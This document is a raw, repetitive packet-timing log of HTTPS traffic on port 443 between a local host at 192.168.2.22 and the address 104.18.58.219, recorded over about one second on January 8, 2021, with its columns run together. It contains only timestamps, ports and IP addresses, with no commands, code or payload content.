                                                        Jan 8, 2021 09:08:30.470613003 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.470640898 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.470650911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.470814943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.471462011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.471504927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.471544981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.471574068 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.472384930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.472423077 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.472453117 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.472533941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.473248005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.473289967 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.473315001 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.473326921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.473377943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.474210024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.474250078 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.474298000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.474306107 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.475158930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.475198030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.475230932 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.475235939 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.475294113 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.475995064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.476042986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.476211071 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.647856951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.647919893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.647958994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.648092985 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.648153067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.648313999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.648360968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.648377895 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.648971081 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.649033070 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.649127960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.649168968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.649220943 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.649883032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.650048018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.650110960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.650130987 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.650717974 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.650826931 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.650895119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.650958061 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.651010036 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.651674032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.651839972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.651901960 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.651902914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.652546883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.652586937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.652610064 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.652669907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.652731895 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.653285980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.653480053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.653528929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.653544903 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.654162884 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.654205084 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.654231071 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.654242992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.654304028 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.655016899 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.655060053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.655097008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.655121088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.655885935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.655926943 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.655961037 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.655967951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.656028986 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.656743050 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.656783104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.656831026 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.656845093 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.657641888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.657684088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.657711029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.657721043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.657803059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.658480883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.658524036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.658562899 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.658574104 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.659415960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.659460068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.659487009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.659497976 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.659569979 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.660204887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.660247087 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.660284996 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.660306931 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.661071062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.661109924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.661143064 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.661156893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.661273003 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.661940098 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.661983013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.662020922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.662043095 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.662833929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.662883043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.662909031 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.662925959 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.663016081 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.663671970 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.663722038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.663764954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.663780928 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.664577007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.664619923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.664649963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.664707899 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.665448904 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.665491104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.665529013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.665546894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.666265011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.666307926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.666344881 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.666357994 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.666399002 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.667105913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.667146921 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.667184114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.667207956 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.667989969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.668031931 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.668060064 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.668071032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.668133020 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.668855906 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.668896914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.668936968 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.668956041 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.669707060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.669749975 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.669780016 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.669787884 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.669850111 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.670567989 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.670610905 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.670650005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.670672894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.671475887 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.671514988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.671544075 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.671561956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.671623945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.672342062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.672386885 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.672425032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.672445059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.673245907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.673297882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.673319101 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.673341990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.673403978 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.674015999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.674057961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.674093962 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.674113035 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.674904108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.674946070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.674973011 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.674973965 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.675029993 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.836894035 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.836939096 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.836987019 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.837058067 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.837102890 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.837151051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.837169886 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.837191105 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.837238073 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.837929964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.837966919 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.837996960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.838021994 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.838604927 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.838639975 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.838670015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.838711977 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.839514971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.839555979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.839577913 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.839596033 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.839636087 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.839637041 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.840281963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.840327024 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:30.840342045 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:30.840367079 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.249577999 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.249593973 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.249717951 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.249733925 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.250394106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.250413895 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.250431061 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.250458956 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.251076937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.251094103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.251110077 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.251143932 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.251837969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.251867056 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.251883984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.251887083 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.251924992 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.252599955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.252619982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.252633095 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.252676964 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.253370047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.253421068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.253437042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.253448009 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.253484011 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.254126072 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.254143953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.254160881 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.254199028 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.254993916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.255012989 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.255028963 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.255059958 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.255611897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.255630970 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.255646944 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.255686998 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.256400108 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.256419897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.256433010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.256552935 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.257164955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.257181883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.257196903 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.257225037 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.257939100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.257957935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.257972956 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.257997036 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.258013964 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.258692980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.258713007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.258728981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.258774996 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.259416103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.259433985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.259449005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.259473085 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.259489059 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.260195017 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.260212898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.260227919 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.260256052 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.260936022 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.260958910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.260978937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.261059999 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.261070013 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.261693001 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.261714935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.261732101 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.261763096 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.262464046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.262490988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.262517929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.262521029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.262640953 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.263257980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.263276100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.263324976 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.263407946 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.263978004 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.263994932 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.264012098 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.264029026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.264055014 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.264779091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.264796972 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.264812946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.264848948 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.265527964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.265547037 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.265563011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.265590906 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.265607119 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.266274929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.266292095 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.266307116 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.266361952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.267227888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.267246008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.267262936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.267317057 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.267771006 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.267806053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.267822981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.267832994 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.267872095 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.268533945 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.268552065 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.268568993 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.268770933 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.269296885 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.269320011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.269337893 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.269398928 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.270073891 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.270096064 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.270112038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.270154953 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.270844936 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.270864010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.270879030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.270937920 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.271593094 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.271611929 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.271626949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.271663904 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.272370100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.272387028 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.272401094 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.272447109 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.419095039 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419150114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:31.419173002 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:31.419190884 CET44349177104.18.58.219192.168.2.22
